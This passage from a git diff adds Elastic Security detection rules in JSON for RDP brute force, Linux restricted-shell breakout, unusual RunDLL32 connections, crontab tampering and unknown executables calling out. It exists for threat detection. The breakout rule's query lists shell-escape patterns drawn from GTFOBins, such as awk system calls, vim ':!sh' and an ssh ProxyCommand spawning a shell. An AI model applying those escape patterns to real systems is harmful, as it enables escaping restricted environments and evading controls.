specific user account within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux RDP Brute Force Attack Detected", + "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json new file mode 100644 index 00000000000..e54a44481fe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Restricted Shell Breakout via Linux Binary(s)", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", + "references": [ + "https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", + "https://gtfobins.github.io/gtfobins/nawk/", + "https://gtfobins.github.io/gtfobins/mawk/", + "https://gtfobins.github.io/gtfobins/awk/", + "https://gtfobins.github.io/gtfobins/gawk/", + "https://gtfobins.github.io/gtfobins/busybox/", + "https://gtfobins.github.io/gtfobins/c89/", + "https://gtfobins.github.io/gtfobins/c99/", + "https://gtfobins.github.io/gtfobins/cpulimit/", + "https://gtfobins.github.io/gtfobins/crash/", + "https://gtfobins.github.io/gtfobins/env/", + "https://gtfobins.github.io/gtfobins/expect/", + "https://gtfobins.github.io/gtfobins/find/", + "https://gtfobins.github.io/gtfobins/flock/", + "https://gtfobins.github.io/gtfobins/gcc/", + "https://gtfobins.github.io/gtfobins/mysql/", + "https://gtfobins.github.io/gtfobins/nice/", + "https://gtfobins.github.io/gtfobins/ssh/", + "https://gtfobins.github.io/gtfobins/vi/", + "https://gtfobins.github.io/gtfobins/vim/", + "https://gtfobins.github.io/gtfobins/capsh/", + "https://gtfobins.github.io/gtfobins/byebug/", + "https://gtfobins.github.io/gtfobins/git/", + "https://gtfobins.github.io/gtfobins/ftp/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "52376a86-ee86-4967-97ae-1a05f55816f0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "52376a86-ee86-4967-97ae-1a05f55816f0_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json new file mode 100644 index 00000000000..bebdda8462f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of rundll32.exe making outbound network connections. This may indicate adversarial Command and Control activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Connection via RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Connection via RunDLL32\n\nRunDLL32 is a built-in Windows utility and also a vital component used by the operating system itself. The functionality provided by RunDLL32 to execute Dynamic Link Libraries (DLLs) is widely abused by attackers, because it makes it hard to differentiate malicious activity from normal operations.\n\nThis rule looks for external network connections established using RunDLL32 when the utility is being executed with no arguments, which can potentially indicate command and control activity.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that RunDLL32 is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Identify the target computer and its role in the IT environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"rundll32.exe\" and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : \"rundll32.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://redcanary.com/threat-detection-report/techniques/rundll32/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "52aaab7b-b51c-441a-89ce-4387b3aea886", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "52aaab7b-b51c-441a-89ce-4387b3aea886_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json new file mode 100644 index 00000000000..22d06ceee6e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create or modify a crontab via a process that is not crontab (i.e python, osascript, etc.). This activity should not be highly prevalent and could indicate the use of cron as a persistence mechanism by a threat actor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious CronTab Creation or Modification", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and process.name != null and\n file.path : \"/private/var/at/tabs/*\" and not process.executable == \"/usr/bin/crontab\"\n", + "references": [ + "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf", + "https://theevilbit.github.io/beyond/beyond_0004/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "530178da-92ea-43ce-94c2-8877a826783d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "530178da-92ea-43ce-94c2-8877a826783d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json new file mode 100644 index 00000000000..598fce90de9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise.", + "from": "now-59m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "filebeat-*", + "packetbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Network Activity to the Internet by Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "destination.ip", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious Network Activity to the Internet by Previously Unknown Executable\n\nAfter being installed, malware will often call out to its command and control server to receive further instructions by its operators.\n\nThis rule leverages the new terms rule type to detect previously unknown processes, initiating network connections to external IP-addresses. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate malicious behavior. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential malicious processes, reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Network Activity Detected via cat - afd04601-12fc-4149-9b78-9c3f8fe45d39\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and \nprocess.executable:(\n (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or \n /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/*\n ) and not (/tmp/newroot/* or /tmp/snap.rootfs*)\n ) and \nsource.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and \nnot process.name:(\n apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or\n saml2aws or wget or yum or 